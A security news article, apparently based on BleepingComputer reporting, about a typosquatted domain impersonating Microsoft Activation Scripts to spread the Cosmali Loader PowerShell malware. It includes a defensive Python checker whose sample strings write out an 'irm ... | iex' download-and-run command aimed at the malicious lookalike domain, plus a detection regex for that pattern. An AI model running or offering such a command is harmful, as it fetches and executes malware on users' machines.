
Fake MAS Domain Spreads Cosmali Loader Malware on Windows

Beware of Cosmali Loader Malware Spreading via Fake MAS Domains on Windows

Security researchers have detected a malicious fake domain impersonating Microsoft Activation Scripts (MAS), a popular Windows activation tool, which is being used to distribute a dangerous PowerShell-based malware known as Cosmali Loader. The incident was first reported by multiple users on Reddit and later confirmed through an in-depth investigation by technology news outlet BleepingComputer.

The attack relies on a technique called typosquatting, where attackers register domains that closely resemble legitimate ones. In this case, users attempting to activate Windows may accidentally mistype the official MAS domain from get.activated.win to get.activate[.]win, missing just a single letter. That small mistake is enough to trigger the download and execution of a malicious PowerShell script on the victim’s Windows system.
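As an added example (not code from the article or from the MAS project), the Python check below does what the maintainers' advice amounts to in practice: it pulls every URL out of a command line, compares each host against an allowlisted domain by edit distance so a single-letter typosquat like the one above stands out, and flags the download-and-run pipe pattern. The allowlist and the sample commands are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed allowlist: the legitimate MAS domain named in the article.
TRUSTED_DOMAINS = {"get.activated.win"}

# URLs end at whitespace, quotes, or shell/PowerShell separators.
URL_RE = re.compile(r"https?://[^\s'\"|;)]+", re.IGNORECASE)

# Download-and-execute in one line: irm/iwr piped straight into iex.
REMOTE_EXEC_RE = re.compile(
    r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b.*\|\s*(iex|Invoke-Expression)\b",
    re.IGNORECASE,
)


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings (insert/delete/substitute cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_host(host: str, trusted=TRUSTED_DOMAINS, max_dist: int = 2) -> str:
    """'trusted' for an exact allowlist hit, 'lookalike of ...' for a near miss, else 'unknown'."""
    host = host.lower().rstrip(".")
    if host in trusted:
        return "trusted"
    for t in trusted:
        d = levenshtein(host, t)
        if 0 < d <= max_dist:
            return f"lookalike of {t} (distance {d})"
    return "unknown"


def audit_command(cmd: str) -> list:
    """Return (host, verdict) for every URL found in a command line."""
    return [(urlparse(u).hostname or "", classify_host(urlparse(u).hostname or ""))
            for u in URL_RE.findall(cmd)]


def is_remote_exec(cmd: str) -> bool:
    """True when the command fetches remote content and pipes it into Invoke-Expression."""
    return REMOTE_EXEC_RE.search(cmd) is not None


if __name__ == "__main__":
    for sample in ("irm https://get.activated.win | iex",   # constructed, legitimate form
                   "irm https://get.activate.win | iex"):   # constructed, one letter short
        print(sample, "->", audit_command(sample), "remote-exec:", is_remote_exec(sample))
```

Run it against a pasted command before executing: the second sample is reported as a lookalike of the trusted domain at distance 1, and both are flagged as download-and-run pipes.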

Once executed, the script displays a pop-up warning claiming that the computer has been infected with Cosmali Loader, urging users to reinstall Windows immediately for safety. According to the warning message, the malware operates with an insecure control panel, meaning that anyone with access to it could potentially take full control of infected machines.

Early signs of infection can be spotted through Task Manager. Users may notice multiple PowerShell processes running simultaneously and consuming unusually high system resources—an indicator that the system may already be compromised.

Security researcher RussianPanda provided additional insight, explaining that Cosmali Loader is an open-source malware loader commonly abused to deploy cryptocurrency miners or highly dangerous remote access trojans (RATs) such as XWorm. This aligns with similar alerts previously published by analysts at GDATA, suggesting that this malware family has been actively reused in multiple attack campaigns.

At present, it remains unclear who is responsible for sending the warning messages to victims. There is speculation that a security researcher may have gained access to the malware’s control panel and used it to alert affected users about the breach. Meanwhile, the legitimate MAS project maintainers have issued a public warning, urging users to carefully verify command syntax and domain names before executing any scripts.

Although Microsoft Activation Scripts remain widely used, cybersecurity experts strongly caution against running unofficial tools or executing remote scripts without fully understanding their behavior. Users are advised to avoid copy-pasting commands from unverified sources and to test scripts in a sandboxed environment whenever possible. These precautions are critical to reducing the risk of falling victim to fake domains and malware disguised as free utilities.

Origin: Bleepingcomputer
